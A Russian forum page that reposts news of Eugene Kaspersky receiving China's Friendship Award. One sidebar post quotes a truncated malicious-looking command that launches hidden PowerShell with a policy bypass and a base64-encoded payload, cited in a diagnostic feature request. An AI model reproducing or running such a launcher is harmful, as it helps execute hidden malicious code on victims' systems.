Перейти к содержанию
Danilka

Евгений Касперский награжден Национальной премией дружбы КНР

Recommended Posts

Danilka

nagrada_knr.png «Лаборатория Касперского» сообщает о присуждению Евгению Касперскому, генеральному директору и соучредителю компании, Национальной премии дружбы КНР. Официальная церемония награждения прошла 29 сентября в Пекине.

Премия дружбы, присуждаемая Государственным управлением по делам иностранных специалистов, является высшей национальной наградой Китая для зарубежных экспертов и свидетельствует о высокой оценке их достижений. Евгений Касперский был удостоен этой премии за выдающийся вклад в развитие индустрии информационной безопасности в Китае. Лауреатов премии поздравил Чжан Дэцзян, вице-премьер Китайской Народной Республики и член Политбюро Центрального Комитета КПК, выразив им благодарность от лица китайского правительства.

29 сентября Евгений Касперский также был приглашен в качестве почетного гостя на празднование 60-летия основания Китайской Народной Республики и получил Награду дружбы реки Хайхэ. Эта награда присуждается с 1993 года муниципальным правительством города Тяньцзинь иностранным специалистам, которые внесли значительный вклад в экономическое и социальное развитие города.

«Лаборатория Касперского» вышла на китайский рынок в 2003 году, и с тех пор достигла значительных успехов в содействии развитию индустрии информационной безопасности в Китае, сделав работу с интернет-приложениями более безопасной и повысив уровень информационной защиты домашних и корпоративных пользователей. В 2009 году «Лаборатория Касперского» стала эксклюзивным поставщиком антивирусных решений для 11-х Национальных Игр, обеспечив комплексную IT-защиту этого важного спортивного события.

«Лаборатория Касперского» создала в Китае локальную лабораторию для исследования вирусов, а также тестовый центр, что сделало возможным активное применение самых передовых технологий. В настоящее время «Лаборатория Касперского» является крупнейшим производителем антивирусных решений на китайском рынке по количеству проданных лицензий.

Источник

post-5261-1255244920_thumb.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Danilka

Виталий Я.

Спасибо,незаметил. ;)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×